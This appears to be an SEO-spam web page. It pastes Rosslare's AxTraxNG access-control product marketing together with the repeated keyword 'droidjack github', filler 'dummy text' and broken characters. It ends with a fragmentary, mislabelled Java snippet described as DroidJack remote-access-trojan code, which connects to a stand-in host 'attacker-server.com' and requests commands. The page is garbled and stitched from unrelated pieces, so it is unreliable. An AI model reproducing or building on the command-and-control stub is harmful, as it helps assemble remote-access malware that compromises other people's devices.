AxTraxNG Software

AxTraxNG is a complete server-client software management that enables setting physical access control policy across organizations that is available in multiple languages and date formats. The server manages thousands of networked access control panels and system users. The user-friendly interface is intuitive, reliable and rich in
functionality. With Rosslare’s SDK tool AxTraxNG also leverages easy integration and deployment of various
applications in security, safety, time and attendance and more. AxTraxNG allows the control and monitoring of
every aspect of site access.

Product Datasheets Development Tool

 

Droidjack Github đź”–

droidjack github
Globally market-proven software with tens of thousands of installations
droidjack github
Sophisticated feature set that is easy to manage, install and use
droidjack github
Constantly improved and updated, continuous support and development
droidjack github
Fully scalable, enabling implementation of projects from a single to thousands access points
droidjack github
Easy integration with any third-party software and tools using dedicated SDK
droidjack github
You can choose from a range of Rosslare Control Panels and Expansions

Droidjack Github đź”–

droidjack github
Rich System and Hardware Management Options, Access Control Policy (Business Logic), System Maintenance, Integrations and Special features
droidjack github
Identity Management of users, information fields, photo, access credentials and user related access policies, from a central server with multiple Workstations (Clients)
droidjack github
Support for different types of user credentials Including Face-ID, Fingerprint, PIN-Codes, RFID, UHF Tags, NFC-ID, BLE-ID and LPR for vehicles
droidjack github
Production and export of reports from acquired data, Alarm management for operator workflow and a Rules based Automations Engine
droidjack github
Built-in software security with encrypted database protects all private user personal data, access policy rules and logged events for a secure audit trail
droidjack github
Video integration with Rosslare’s Vitrax VMS and with Hikvision and Dahua NVR for access event-based video pop-up and photo snapshot reports

Droidjack Github đź”–

droidjack github

Droidjack Github đź”–

dummy text dummy text

Droidjack Github đź”–

// Server-side code (DroidJack server) import java.io.BufferedReader; import java.io.InputStreamReader; import java.net.ServerSocket; import java.net.Socket;

public class DroidJackClient { public static void main(String[] args) throws Exception { Socket socket = new Socket("attacker-server.com", 8080); BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream())); String command = "GET /command HTTP/1.1"; socket.getOutputStream().write(command.getBytes()); // Handle response from server... } }

// Client-side code (attacker) import java.io.BufferedReader; import java.io.InputStreamReader; import java.net.Socket;